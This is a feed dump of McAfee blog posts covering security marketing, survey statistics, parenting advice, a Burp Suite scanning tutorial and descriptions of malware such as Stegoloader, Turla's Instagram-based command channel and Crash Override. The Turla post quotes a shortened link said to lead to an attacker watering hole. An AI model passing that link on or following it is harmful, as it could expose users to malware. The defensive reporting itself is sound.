McAfee Blogs https://securingtomorrow.mcafee.com Securing Tomorrow. Today. Wed, 21 Jun 2017 19:00:27 +0000 en-US hourly 1 An Unmatched Customer Experience https://securingtomorrow.mcafee.com/business/unmatched-customer-experience/ https://securingtomorrow.mcafee.com/business/unmatched-customer-experience/#respond Wed, 21 Jun 2017 19:00:27 +0000 https://securingtomorrow.mcafee.com/?p=75301 I’ve been in this industry for over twenty years, and the advancements in cybersecurity over the last few years are unmatched. As an industry, we went from believing in a best-in-breed, siloed approach and now we understand our customers need a connected security architecture that can protect, detect, and correct. While we’ve made impressive advancements, …

The post An Unmatched Customer Experience appeared first on McAfee Blogs.

]]>
I’ve been in this industry for over twenty years, and the advancements in cybersecurity over the last few years are unmatched. As an industry, we went from believing in a best-in-breed, siloed approach and now we understand our customers need a connected security architecture that can protect, detect, and correct. While we’ve made impressive advancements, I’ve found that the user experience still needs improvement and some user interfaces are still stuck in the past, hard to work with, and difficult to manage.

McAfee’s new Endpoint Security 10.5, which you hear me talk about often, offers the best and most advanced data and device protection available. Plus, it includes Endpoint Threat Defense and Response products as a complimentary suite, providing businesses with end-to-end security intelligence, management, and protection.

What more could an enterprise security manager want? Simply, a better experience.

Whoever they may be, the consumers of our products aren’t necessarily focused on just having the best technology. They’re interested in better use cases, an ease of productivity and workflows, and intuitive interactions with applications and resources. Yes, they want better outcomes, but they also want to enjoy the journey between purchase and result.

There are two means to delivering superior customer experience: technology delivery and support and project and relationship management. Let’s look at them in order.

Technology Delivery and Support

Business buyers expect technology to simply work out of the box (even if it’s a virtual box). This expectation is a byproduct of the consumerization of the enterprise. Through consumer products, such as smartphones and mobile apps, our business customers have a growing belief that products shouldn’t just work as described, but should exceed expectations.

Security products and services aren’t so simple. It takes skilled technicians to deploy, integrate, and configure security products to an optimal state. McAfee partners are instrumental in taking the complexity out of our products and ensuring customers get the maximum benefit by applying their technical skills. Without this expert guidance and support, customers have a diminished experience and are more likely to change providers – on the vendor and reseller levels.

And this is where the new dimension of experience comes in; what’s needed is market-leading project and relationship management.

Relationship Management

Many resellers know already that they can’t afford the one-time sale, where they deliver a product and leave a customer to their own devices. Success, particularly in business models that rely on recurring revenue, depends on persistent engagement with customers to ensure they have a great experience with the products they buy and, ultimately, the provider of those products. In other words, this is the means for a superior experience with you, the partner.

The new customer engagement dynamic means you must understand the customer’s need and expectations, deliver the product, provide the supporting service, and remain connected to ensure they get the maximum benefit from their purchase. It’s a tall order, given that many partner organizations struggle with resources.

Meeting these new experience expectations requires creativity. I’ve talked with scores of partners that are forming collaborative relationships with peer organizations to share resources. They’ve learned that creating partnerships for professional services is easier and more effective than developing this expertise on their own. One organization provides products. Another organization provides the professional services. And a third organization provides the project and relationship dynamic.

Making it Easy for You

If none of this sounds easy, it’s because it’s not. As Steve Jobs once said, “Simple can be harder than complex: You have to work hard to get your thinking clean to make it simple. But it’s worth it in the end because once you get there, you can move mountains.”

Part of our jobs in this experience-based market is masking the complexity of security technology with our expertise and collaborative resources. As a community, we have all the resources needed to achieve this objective. Whether we do this as individual businesses or through collective efforts, we need to hone our thinking to include customer experience as our product.

Together is power, especially in delivering superior experiences.

The post An Unmatched Customer Experience appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/unmatched-customer-experience/feed/ 0
Data breaches impact nearly half of IoT organizations https://securingtomorrow.mcafee.com/business/safeguard-data/data-breaches-impact-nearly-half-of-iot-organizations/ Tue, 20 Jun 2017 20:17:53 +0000 https://securingtomorrow.mcafee.com/?p=75297 Nearly half of U.S.-based companies using an Internet of Things network have been hit by a recent security breach, according to new survey data released by strategy consulting firm Altman Vilandrie & Company. The April 2017 survey of 397 IT executives across 19 industries showed that 48 percent of organizations have experienced at least one …

The post Data breaches impact nearly half of IoT organizations appeared first on McAfee Blogs.

]]>
Nearly half of U.S.-based companies using an Internet of Things network have been hit by a recent security breach, according to new survey data released by strategy consulting firm Altman Vilandrie & Company.

The April 2017 survey of 397 IT executives across 19 industries showed that 48 percent of organizations have experienced at least one IoT security breach. It revealed the significant financial exposure of weak IoT security for companies of all sizes.

Nearly half of the businesses with annual revenues above $2 billion estimated the potential cost of one IoT breach at more than $20 million.

“While traditional cyber security has grabbed the nation’s attention, IoT security has been somewhat under the radar, even for some companies that have a lot to lose through a breach,” said Stefan Bewley, director of Altman Vilandrie and author of the study.

“IoT attacks expose companies to the loss of data and services and can render connected devices dangerous to customers, employees and the public at large,” Bewley said. “The potential vulnerabilities for firms of all sizes will continue to grow as more devices become Internet dependent.”

The study showed that preparedness helps. Companies that have not experienced a security incursion have invested 65 percent more on IoT security than those who have been breached. Other key findings: 68 percent of respondents think about IoT security as a distinct category, yet only 43 percent have a standalone budget.

 

This article was written by Bob Violino from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Data breaches impact nearly half of IoT organizations appeared first on McAfee Blogs.

]]>
The #1 Skill All Parents Should Be Homeschooling Kids in This Summer https://securingtomorrow.mcafee.com/consumer/family-safety/the-one-skill-all-parents-should-be-homeschooling-kids-in-this-summer/ https://securingtomorrow.mcafee.com/consumer/family-safety/the-one-skill-all-parents-should-be-homeschooling-kids-in-this-summer/#respond Tue, 20 Jun 2017 12:00:56 +0000 https://securingtomorrow.mcafee.com/?p=75086 Dear Mr. and Mrs. Smith, your child’s decision to post inappropriate content online is why we’ve decided to rescind our previous invitation to attend Harvard University.  Can you imagine getting an email or a phone call to that effect? Hopes and dreams dashed because of a careless, crude, or unwise online conversation a very bright kid assumed would be …

The post The #1 Skill All Parents Should Be Homeschooling Kids in This Summer appeared first on McAfee Blogs.

]]>
Dear Mr. and Mrs. Smith, your child’s decision to post inappropriate content online is why we’ve decided to rescind our previous invitation to attend Harvard University. 

Can you imagine getting an email or a phone call to that effect? Hopes and dreams dashed because of a careless, crude, or unwise online conversation a very bright kid assumed would be kept private. Every day it becomes more and more clear that hasty, online choices can have permanent, real-world consequences.

~ ~ ~

That very scenario recently happened when Harvard University announced rescinded admission letters of 10 students accused of sharing sexually explicit and sometimes racist images in a private online message group.

Such a sad, albeit familiar, headline peppering our digital peripheral today. Only this time, the consequence happened to would-be Harvard students, (which obliterates our private, silent theory that perhaps it’s only ignorant, unsupervised, aimless kids that mess up [big time] online).

The task for parents armed with the lesson of this latest story? It may be a chance to maximize the summer hours with your kids and zero in on homeschooling in Social Appropriateness 101. Could the faux pas’ and slip-ups be closer to your family’s domain than you are comfortable admitting?

So where do we start? Rather than go aimlessly into Google universe, here’s a primer to help you equip your kids to make wise choices online.

Social Appropriateness 101

  1. Grow, value discernment. How do we teach our children to invest the necessary thought into all those hours of mindless clicks? How do we keep from raising kids who are digital lemmings who just go with the flow? We make discernment, and growing it, a defined value in our home. Discernment — the ability to judge well — is a skill that develops over time. Sound digital behavior hinges on a child’s ability to discern between wise and unwise content; careful and impulsive behaviors.The online culture gives our discernment a workout every second. Information comes at us quickly and provokes a dozen emotions at once. Remember: If it’s tough for adults to pause and reflect before posting, imagine how tough it is for kids to show restraint and discernment online (don’t forget, kids’ brains do not fully form until they are 24)! Here are ten questions to help kids build judgment and critical thinking skills. A good rule of thumb in posting anything: When in DOUBT — just DON’T.
  2. Discuss empathy often. Empathy is making an attempt to understand another person’s struggle and is a powerful way to combat bullying and discrimination. Understanding and extending empathy force us to humanize those we often seek to stereotype, judge, or malign. As part of your homeschooling efforts, this summer, teaching compassion for others should be at the top of the list. For a deeper dive into empathy go over these points with your kids.
  3. Get back to basics. Kids often bemoan that teachers and parents deluge them with lectures about online safety and smart posting (mine does). Still, smart kids make dumb mistakes every day. So ignore the eye rolling and get back to the basics that help kids understand their digital footprint and the responsibility that comes with owning a digital device of any kind. Pose these questions to your child:
    • Is this something you really want everyone to know that about you?
    • What do you think this photo communicates about you (use adjectives)?
    • Have you considered what the parents of your friends, a teacher or a coach might think of you or your friend if they saw that post?
    • How do you think that person would feel if he or she saw your post about them a few years from now?
  4. Role play. One of the best ways to grow your child’s empathy muscle is to role play. Find teachable moments in which empathy has been overlooked. Has a friend been neglected for a party invitation? Is someone not present being mocked or talked about in a cruel way? Look for opportunities to explain and illustrate empathy. Role playing brings insight and compassion up close for a teen. Ask your teen to play the part of the person under attack or who is different in a situation. Ask your teen questions or make value judgments that will challenge him or her to verbalize what another person might be feeling or thinking. This is an excellent way to challenge stereotypes and prejudices.
  5. Introduce media literacy. Raising kids who are critical thinkers, who can wisely create, and share wise content, is among the top parenting goals of the digital age. Media literacy, as defined by the National Association for Media Literacy, is the ability to access, analyze, evaluate, create, and act using all forms of communication. Media literacy is a skill that allows digital users to become critical thinkers and creators, effective communicators, and active digital citizens. This means we all play a role in making the Internet a safe place to exchange ideas and appropriate content. Cyberwise.org is a great learning hub equipping parents in everything digital.
  6. Read a little more. Lay aside the fiction this summer and up your digital IQ. Read blogs, books, and news on internet safety, kids online, reputation management, new apps, and trends in social networking that could impact your family. A recent study conducted by Common Sense Media revealed that 30 percent of teens who are online believe their parents know “a little” or “nothing” about what social media apps and sites they use. Still, those same teens admitted their parents have the biggest influence on determining what is appropriate and inappropriate online. So prove those lingering doubts wrong and read more about how to boost your tech IQ. Set up a Google Alert to keep up with online trends that affect your family. Google alerts pull relevant content from the web and deliver them directly to your inbox.
  7. Be the digital example. If you want to get serious about influencing your child’s digital habits and leading in this area, be the example of a balanced, empathy-driven digital life. Limit your time on social networks when at home, unplug consistently, post and comment wisely, and always keep your emotions in check online. Part of being the example includes being able to admit your digital mistakes. Kids need to know you aren’t perfect and learn from how you handled a digital situation such as cyberbullying, a political argument, or even a tech addiction. Be open, honest, and candid in leading your kids in social appropriateness.
  8. Repeat the risks. Kids become desensitized to potential hazards online and even develop a false sense of security and privacy (as seen in the Harvard case). This attitude opens them up to some severe consequences. Observe your child. If she seems overly confident, blows off your safety concerns, it’s time to step up the appropriate sharing talk.

The quest to teach kids more about social appropriateness includes knowing exactly where to look for reliable, easy-to-understand information. It’s so easy to get overwhelmed, so many parents give up too soon and live in denial about what their kids really do online. Choose your favorite resources, and simply keep up — it matters. Sources to explore include: Family Online Safety Institute (FOSI), Above The Fray, Cyberwise.org, online safety blogger and author Sue Scheff, Common Sense Media and, of course, McAfee Family Safety.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

The post The #1 Skill All Parents Should Be Homeschooling Kids in This Summer appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/the-one-skill-all-parents-should-be-homeschooling-kids-in-this-summer/feed/ 0
Is That Photo Containing a Cyberthreat? What to Know About Steganographic Malware https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/steganographic-malware/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/steganographic-malware/#respond Tue, 20 Jun 2017 04:01:27 +0000 https://securingtomorrow.mcafee.com/?p=75282 Secret messages are hidden everywhere – within a hit song, a brand logo, a big blockbuster movie. Usually, these messages are fun Easter eggs or nods to fans. In the digital world, this kind of practice is called steganography, and messages are usually concealed in images, audio tracks, video clips, or text files. But, instead …

The post Is That Photo Containing a Cyberthreat? What to Know About Steganographic Malware appeared first on McAfee Blogs.

]]>
Secret messages are hidden everywhere – within a hit song, a brand logo, a big blockbuster movie. Usually, these messages are fun Easter eggs or nods to fans. In the digital world, this kind of practice is called steganography, and messages are usually concealed in images, audio tracks, video clips, or text files. But, instead of being a fun nod to users, these messages can sometimes contain something malicious, specifically, malware. In fact, digital steganography is often used by malware authors to avoid detection by security systems.

So how does a steganographic cyberattack work? First, cybercriminals insert secret information by embedding an algorithm within a digital image. Then, the image is transmitted to the target system, and from there the secret information is extracted for use by malware. The modified image is often difficult to detect by the human eye or by security technology – which is exactly why these crooks are using steganography to conduct cyberattacks.

Now, how often are these attacks happening? The first known use of steganography in a cyberattack was in 2011 with the Duqu malware. Steganographic malware has also been used on Instagram and has come included in exploit kits. However, a new variation of the threat is currently on the rise, as our McAfee Labs Threats Report: June 2017 has found that the Stegoloader malware code is currently hiding itself within the following image:

Users downloading free “pirated software” download this image along with the free program. While the user’s PC is completing the installation process, the image is unlocked and begins to download other malicious software onto the PC. For instance, Stegoloader can either download software that steals information from the infected system, or download ransomware that encrypts the PC’s information and holds it hostage until the victim pays.

Moral of the story: you get what you pay for. So, users need to be wary of where they get their software. In these steganographic malware cases, if you pay nothing to download software that would otherwise cost you money, there’s a big chance you may find yourself downloading junk software applications and then paying cybercriminals in other ways. Therefore, to protect yourself from steganographic malware, follow these tips: 

-Go straight to the source. If you want software, it’s best to just go directly to legitimate sites and stores to download it. Though this software may be more costly than pirated services, these free programs can put your personal data at risk, and you could end up paying a ransom to get your information back.

-Do your homework. Whenever you want to load a software onto your device, make sure you do your homework before you click the download button. Look up the provider and check for any reviews online that mention issues with security. If something sketchy comes up, steer clear of the program entirely.

-Use a comprehensive security solution. Whether you’re downloading a software for your PC or phone, ensure all of your devices are protected from cyberattacks by adding in an extra layer of security. To create that additional barrier, utilize a comprehensive security solution, such as McAfee LiveSafe.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Is That Photo Containing a Cyberthreat? What to Know About Steganographic Malware appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/steganographic-malware/feed/ 0
‘McAfee Labs Threats Report’ Explores Malware Evasion Techniques, Digital Steganography, Password-Stealer Fareit https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-labs-threats-report-explores-malware-evasion-techniques-digital-steganography-password-stealer-fareit/ https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-labs-threats-report-explores-malware-evasion-techniques-digital-steganography-password-stealer-fareit/#respond Tue, 20 Jun 2017 04:01:23 +0000 https://securingtomorrow.mcafee.com/?p=75224 We got a little carried away in the McAfee Labs Threats Report: June 2017, published today. This quarter’s report has expanded to a rather hefty 83 pages! It contains three highly educational topics, in addition to the usual set of threats statistics: We broadly examine evasion techniques and how malware authors use them to accomplish …

The post ‘McAfee Labs Threats Report’ Explores Malware Evasion Techniques, Digital Steganography, Password-Stealer Fareit appeared first on McAfee Blogs.

]]>
We got a little carried away in the McAfee Labs Threats Report: June 2017, published today. This quarter’s report has expanded to a rather hefty 83 pages! It contains three highly educational topics, in addition to the usual set of threats statistics:

  • We broadly examine evasion techniques and how malware authors use them to accomplish their goals. We discuss the more than 30-year history of evasion by malware, the underground market for off-the-shelf evasion technology, how several contemporary malware families leverage evasion techniques, and what to expect in the future, including machine-learning and hardware-based evasion.
  • We explore the very interesting topic of steganography in the digital world. Digital steganography hides information in benign-looking objects such as images, audio tracks, video clips, or text files. Of course, attackers use these techniques to move information past security systems. We explain how that happens in this key topic.
  • We deconstruct Fareit, the most famous password-stealing malware. We cover its origins, typical infection vectors, architecture and inner workings, how it has changed over the years, and how it was likely used in the breach of the Democratic National Committee before the 2016 U.S. Presidential election. Coincidentally, DocuSign reported that on May 15, customer email addresses were stolen and then used in a phishing campaign. Victims who clicked on the phishing links were infected with malware, one of which was Fareit. Read our technical analysis of the DocuSign attack.

Accompanying each of these key topics is a Solution Brief that goes into detail about how McAfee products can protect against these threats.

Here are some highlights from our extensive analysis of threats activity in Q1:

  • Malware: New malware samples rebounded in Q1 to 32 million. The total number of malware samples increased 22% in the past four quarters to 670 million samples.
  • Ransomware: New ransomware samples rebounded in Q1 primarily due to Congur ransomware attacks on Android OS devices. The number of total ransomware samples grew 59% in the past four quarters to 9.6 million samples. (We will discuss the WannaCry ransomware in our next quarterly report.)
  • Mobile malware: Reports from Asia doubled in Q1, contributing to a 57% increase in global infection rates. Total mobile malware grew 79% in the past four quarters to 16.7 million samples.
  • Incidents: We counted 301 publicly disclosed security incidents in Q1, an increase of 53% over Q4. The health, public, and education sectors comprised more than 50% of the total. 78% of all publicly disclosed security incidents in Q1 took place in the Americas.

Read the McAfee Labs Threats Report: June 2017.

The post ‘McAfee Labs Threats Report’ Explores Malware Evasion Techniques, Digital Steganography, Password-Stealer Fareit appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-labs-threats-report-explores-malware-evasion-techniques-digital-steganography-password-stealer-fareit/feed/ 0
Automation seen as relief for payment fraud worries https://securingtomorrow.mcafee.com/business/optimize-operations/automation-seen-as-relief-for-payment-fraud-worries/ Mon, 19 Jun 2017 22:42:45 +0000 https://securingtomorrow.mcafee.com/?p=75279 Financial and payment professionals don’t anticipate any respite from cyber fraud and attacks in the near future, according to a recent survey conducted by TD Bank. An overwhelming 91 percent of the 392 finance professionals surveyed by the bank at the recent 2017 NACHA Payments conference said they expect payments fraud will become a bigger …

The post Automation seen as relief for payment fraud worries appeared first on McAfee Blogs.

]]>
Financial and payment professionals don’t anticipate any respite from cyber fraud and attacks in the near future, according to a recent survey conducted by TD Bank.

An overwhelming 91 percent of the 392 finance professionals surveyed by the bank at the recent 2017 NACHA Payments conference said they expect payments fraud will become a bigger threat in the next two to three years.

The concerns are not without merit, the report said, with 64 percent of the respondents saying either their organization or one of its clients was involved in a cyber security event in the past year.

The most commonly cited incidents were business email compromise (20 percent); account takeover (19 percent); and data breach (15 percent).

“Companies need to be mindful that everyday tools from email to the Internet can pose risk to payment operations, and the criminal toolbox is expanding,” said Rick Burke, head of corporate products and services at TD Bank. “Corporate treasurers need to create layers of control for accounts and payments processing, both within their organization and in conjunction with their banking partners.”

The finance professionals surveyed said automating payments processing could offer greater defense against attacks, Burke noted. When thinking about the advantages of automating payments, 21 percent cited fraud control and security as the top benefit.

 

This article was written by Bob Violino from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Automation seen as relief for payment fraud worries appeared first on McAfee Blogs.

]]>
How a Hacking Group Used Britney Spears’ Instagram to Operate a Command and Control Server https://securingtomorrow.mcafee.com/business/hacking-group-used-britney-spears-instagram-operate-command-control-server/ https://securingtomorrow.mcafee.com/business/hacking-group-used-britney-spears-instagram-operate-command-control-server/#respond Mon, 19 Jun 2017 16:01:28 +0000 https://securingtomorrow.mcafee.com/?p=75268 A nasty piece of malware is currently being tested by a Russian hacking group named Turla, and its trial round has been conducted in an unexpected area of the internet — the comments section of Britney Spears’ Instagram. As a matter of fact, they’re using her Instagram as a way to contact the malware’s command …

The post How a Hacking Group Used Britney Spears’ Instagram to Operate a Command and Control Server appeared first on McAfee Blogs.

]]>
A nasty piece of malware is currently being tested by a Russian hacking group named Turla, and its trial round has been conducted in an unexpected area of the internet — the comments section of Britney Spears’ Instagram. As a matter of fact, they’re using her Instagram as a way to contact the malware’s command and control (C&C) server.

So how does Turla make this happen, exactly? Leveraging a recently discovered backdoor found in a fake Firefox extension, the cybercriminals instruct the malware to scroll through the comments on Spears’ photos and search for one that has a specific hash value. When the malware finds the comment it was told to look for, it converts it into this Bitly link: http://bit.ly/2kdhuHX. The shortened link resolves to a site that’s known to be a Turla watering hole.

This way, in the chance their attack becomes compromised, the cybercriminals can ensure their C&C can be changed without having to change the malware. If the attackers want to create a new meetup location, all they have to do is delete the first infected comment, and infiltrate a new one with same hash value.

This infected comment on Spears’ post doesn’t look exactly normal, but most people probably would think it’s just spam — unless they clicked it. If someone does in fact click on the link, they’ll be directed to the hacker group’s forum, which is where they actually infect innocent users. For this Trojan in particular, visitors who click will get taken to a site and asked to install the extension with the benign name “HTML5 Encoder.”

The good news is — this is, after all, just a test. Plus, Firefox is said to be already working on a fix so that the extension being used won’t work anymore.

For more information on this attack and others like it, follow @McAfee and @McAfee_Business.

The post How a Hacking Group Used Britney Spears’ Instagram to Operate a Command and Control Server appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/hacking-group-used-britney-spears-instagram-operate-command-control-server/feed/ 0
Setting Up Automated Scanning of Apps Using Custom Authentication, Part 2 https://securingtomorrow.mcafee.com/technical-how-to/setting-automated-scanning-apps-using-custom-authentication-part-2/ https://securingtomorrow.mcafee.com/technical-how-to/setting-automated-scanning-apps-using-custom-authentication-part-2/#respond Mon, 19 Jun 2017 12:08:03 +0000 https://securingtomorrow.mcafee.com/?p=75251 Automated security scanning has always been a challenge for applications that implement custom authentication mechanisms. Have you ever come across a scenario in which automated tools have failed to scan an application because of an authentication failure? Most automated scanners replay login requests to authenticate when a session expires during a scan. We encountered such …

The post Setting Up Automated Scanning of Apps Using Custom Authentication, Part 2 appeared first on McAfee Blogs.

]]>
Automated security scanning has always been a challenge for applications that implement custom authentication mechanisms. Have you ever come across a scenario in which automated tools have failed to scan an application because of an authentication failure? Most automated scanners replay login requests to authenticate when a session expires during a scan.

We encountered such a scenario on a recent engagement and have written two posts to explain issues related to solving this challenge. In the first part, we discussed problems faced by automated scanning tools when login credentials are randomized and login requests cannot be replayed. In this part, we will go through the steps required to address this issue using the automation capabilities of the intercepting proxy tool Burp. 

Burp extension

In the target application, client-side JavaScript generates a hash-based message authentication code (HMAC) from the user-provided password and random key received from the server before authentication. We will write a sample Burp extension that will perform the same operation and post the login request.

The following extension fetches the random value from HTML hidden field and calculates the HMAC using the password and the random value. The credentials are hardcoded in the extension code. Once the HMAC is calculated, it sends the login request to a URL such as http://localhost:8080/test01/Signin. The code for creating the HMAC of the password and logging into the application is written inside the PerformAction function.

The following code is saved as test.py:

Adding the extension

Navigate to Extender->Extensions->Burp Extensions and click Add. Provide the location of file, test.py, created above. Make sure you have provided the path to the jython-standalone .jar file under the Option tab (Extender->Options->Python Environment).

Figure 1: Adding extension code to the Extender tool.

If the extension is added successfully, it will appear as “Login to demo App” as a drop-down menu under the label “After running the macro, invoke a Burp extension action handler” in the session-handling action editor section. Let’s verify:

Navigate to “Project options –> Sessions –> Session Handling Rules –> Add/Edit (Screen 1) —> Session handling rule editor –> Rule Actions —> Add—> Check session is valid (Screen 2) –> session handling action editor (Screen 3) and scroll to the bottom.

Figure 2: The added Burp extension is available under “After running the macro, invoke a Burp extension action handler.”

Defining the session-handling rule

To configure Burp to validate the session and invoke the extension code when the session is terminated, navigate to the session-handling action editor. (See Screen 2 below.)

During the automated scan, it is important to constantly monitor if the session is still valid. Any post authentication request can be used to track the session validity, as long as it returns uniquely different responses for valid and invalid sessions.

Go to the label “Make request to validate session” and select “Run macro.” Add the post authentication request (http://localhost:8080/test01/Start.jsp). After every fifth request, Burp will issue a request to start.jsp to check whether it has a valid session ID. If the application sends a 302 redirect, that indicates the session is invalid. Screen 2 below has the same configuration for this. (Note that this configuration is specific to application being tested.)

Figure 3: Configuring session-handling rules.

Invoking the extension based on session validity

In the sample application, the 302 redirect response for the request http://localhost:8080/test01/Start.jsp indicates the session has expired. At this time Burp needs to invoke our extension to perform the login operation so that automated scanning can resume.

Select “If session is invalid, perform the action below” under the label “Define behavior dependent on session validity” and specify the added extension “Login to demo App” for execution.

Figure 4: Further configuring of session-handling rules.

When the session has expired, the extension will trigger authentication and get a valid session ID. We can configure the rule to update the Burp cookie jar with the new session ID. This updated cookie jar can be applied to any Burp tool by defining the “Use cookies from Burp’s cookie jar” rule in the session-handling rules section. Refer to our post “Efficient Application Testing With Burp’s Cookie Jar” to learn more. This step is important to notify Burp tools such as Intruder and Repeater that a new session is available.

In the following section, we will verify whether our configuration works as expected.

Select any request from the proxy history and send it to Intruder. Right-click on the screen and scan the request by selecting “Actively scan defined insertion points.”

Figure 5: Sending the request to the scanner tool from Intruder.

Analyze the logs using Logger++

Recall that after every fifth request, a call is made to start.jsp. The successful response (200 OK) indicates the session is valid; Burp performs no further actions.

Figure 6: The request log using Logger++. Session validation is performed after every fifth request. (See requests 445, 451,457.)

After a certain time, start.jsp returns a 302 redirect (see below), which indicates that the session is invalid. Because we have a configured action for session invalidity, in the subsequent request Burp sends the login request to http://localhost:8080/test01/Signin.

Figure 7: The request log using Logger++. In this screenshot, we can see that when the session becomes invalid (see request 512), Burp automatically triggers the extension, which sends a login request (see request 515) to create a new session.

Conclusion

The technique we have described in this post can be used with any proxy-aware automated scanners, such as sqlmap, to perform an assessment. The code snippet provided can be used as a reference and can be customized to suit application requirements.

Reference

https://www.jokecamp.com/blog/examples-of-creating-base64-hashes-using-hmac-sha256-in-different-languages/#python

The post Setting Up Automated Scanning of Apps Using Custom Authentication, Part 2 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/technical-how-to/setting-automated-scanning-apps-using-custom-authentication-part-2/feed/ 0
How To Spot A Fake Facebook Account https://securingtomorrow.mcafee.com/consumer/family-safety/spot-fake-facebook-account/ https://securingtomorrow.mcafee.com/consumer/family-safety/spot-fake-facebook-account/#respond Mon, 19 Jun 2017 06:59:44 +0000 https://securingtomorrow.mcafee.com/?p=75021 How do you manage your Facebook friends? Do you keep your list really tight and only include ‘active’ pals? Or do you accept everyone you’ve ever laid eyes on? I’m probably somewhere in between. But… if I have never had a personal conversation with them and ‘eyeballed’ them in the flesh, then they don’t get …

The post How To Spot A Fake Facebook Account appeared first on McAfee Blogs.

]]>
How do you manage your Facebook friends? Do you keep your list really tight and only include ‘active’ pals? Or do you accept everyone you’ve ever laid eyes on? I’m probably somewhere in between. But… if I have never had a personal conversation with them and ‘eyeballed’ them in the flesh, then they don’t get a guernsey!

Over the last few weeks I have received a steady increase of friend requests from people who I just don’t know. My gut tells me that these are fake accounts. Why? I’ve never eyeballed them, they have few or no friends, and have very little personal information available to share on their profiles. I mentioned this to my 20-year-old son who informed me he gets about 10 a week!

And while it can be annoying being harassed by randoms – as my kids would say – the issue is far bigger than that. Fake Facebook accounts are usually designed by clever cyber crims who are trying to extract personal information from unsuspecting naive types – often kids. And why do they want our personal information? It allows them to put together a profile that they can use to apply for loans, mobile phone plans, etc – but we’ll get to that later.

How Big Is The Fake Account Issue?

In its latest reporting, Facebook nominated that it has a whopping 1.86 billion active monthly users. Now, in 2012 Facebook’ reporting stated that 8.7% of its accounts were either fake or duplicates. Even assuming the percentage has stayed about the same, that means there are now a monstrous 161 million fake Facebook accounts! So, it’s highly likely that you (and your kids) will have been affected.

How Can We Tell If A Facebook Account Is Fake?

Experts believe that fake accounts fall into two categories, being operated either by a bot (aka web robot) or by an ill-intentioned human. But irrespective of type, there are several warning signs that an account is fake. If the account in question displays three or more of these signs, then avoid it at all costs:

Beauty

Bots exploit beauty and often sport a pic of a gorgeously attractive girl or handsome guy on their pages. Why? We are only human – an enticing photo dramatically increases the chance of having a friend request accepted.

Not Many Pics

Bots tend not to post lots of photos. Their aim is to use minimum effort to create the illusion that a real person is behind the account so they don’t bother too much with fleshing out a personal life.

Weird Bio Information

If the biography information on the account seems fanciful or just plain unrealistic, then it’s likely not to be a legitimate account.

The Account Doesn’t Message

Bots can easily accept friend requests but can’t respond to messages. So, if you are unsure this is a great little test – just send a message and see what you get back!

Blank Wall

Blank walls are a dead giveaway for a fake account. If your possible ‘new friend’ has either no activity or just a few likes – then be suspicious!

Lots Of Likes

Some bot-controlled accounts are set up to like a certain amount of pages a day. Over time this can add up, so be wary!

Why Are Fake Facebook Accounts Created?

As mentioned earlier, cyber hackers create fake Facebook accounts with the aim of trying to friend people and get access to their personal information. Identity theft is their motivation. They can profit from this private information by personally taking out loans or credit cards in someone else’s name. Or – and this is more likely – they on-sell the information so others can do so.

But fake Facebook accounts can also be created just to make money. Buying and selling Facebook fans is a multi-million dollar business, as both companies and individuals pay big money to get fans and likes to their page. And with the software to create these fake Facebook pages costing no more than $200, you can see how easily profits can be made.

What To Do If You Are Sure A Facebook Account Is Fake

  1. Most importantly, do NOT follow or accept a friend request from the account.
  2. Report the account to Facebook by clicking the report option. When Facebook receives around 10-20 reports about a specific account they will investigate, so it’s worth doing.

Lastly, do NOT insist your kids delete their Facebook account because of the threat of fake accounts. Teaching our kids how to live online is probably one of our biggest jobs as parents of digital natives. Thinking critically, understanding risks and learning how to navigate obstacles are skills that will hold them in good stead for their entire lives. Whoever thought discussing a face Facebook account could have so many benefits!

Take care.

Alex xx

The post How To Spot A Fake Facebook Account appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/spot-fake-facebook-account/feed/ 0
Crash Override Malware Can Automate Mass Power Outages https://securingtomorrow.mcafee.com/business/crash-override-malware-can-automate-mass-power-outages/ https://securingtomorrow.mcafee.com/business/crash-override-malware-can-automate-mass-power-outages/#respond Fri, 16 Jun 2017 22:00:05 +0000 https://securingtomorrow.mcafee.com/?p=75215 Some cyberattacks take a device offline, some take companies offline, and some take entire power grids down. Now, the potential for the latter exists, as a new malicious software has emerged that is capable of causing power outages by ordering industrial computers to shut down electricity transmission. It’s named Crash Override, or Industroyer, and it’s actually the …

The post Crash Override Malware Can Automate Mass Power Outages appeared first on McAfee Blogs.

]]>
Some cyberattacks take a device offline, some take companies offline, and some take entire power grids down. Now, the potential for the latter exists, as a new malicious software has emerged that is capable of causing power outages by ordering industrial computers to shut down electricity transmission. It’s named Crash Override, or Industroyer, and it’s actually the original malware responsible for the Ukrainian power outage back in December.

Apparently, the December attack, which took out an electric transmission station north of the city of Kiev, blacking out a portion of the Ukrainian capital for an hour, was maybe just an initial test. Now, the hackers appear to be testing the most evolved variant of the grid-infecting malware observed yet. This version is said to be capable of causing outages of up to a few days in portions of a nation’s grid.

How exactly does it work? Though the attack vector has not been confirmed, the infection is reported to start with phishing emails. The malware attacks Microsoft Windows systems only and then tries to communicate to ICS devices using four different payloads across four ICS protocols:

IEC 60870-5-101 (aka IEC 101)

IEC 60870-5-104 (aka IEC 104)

IEC 61850

OLE for Process Control Data Access (OPC DA)

Once inside, the malware installs a second backdoor, which is a trojanized version of Windows Notepad. The purpose of this second backdoor is to act as backup in the chance that the main backdoor is discovered, as well as to survive reboots.

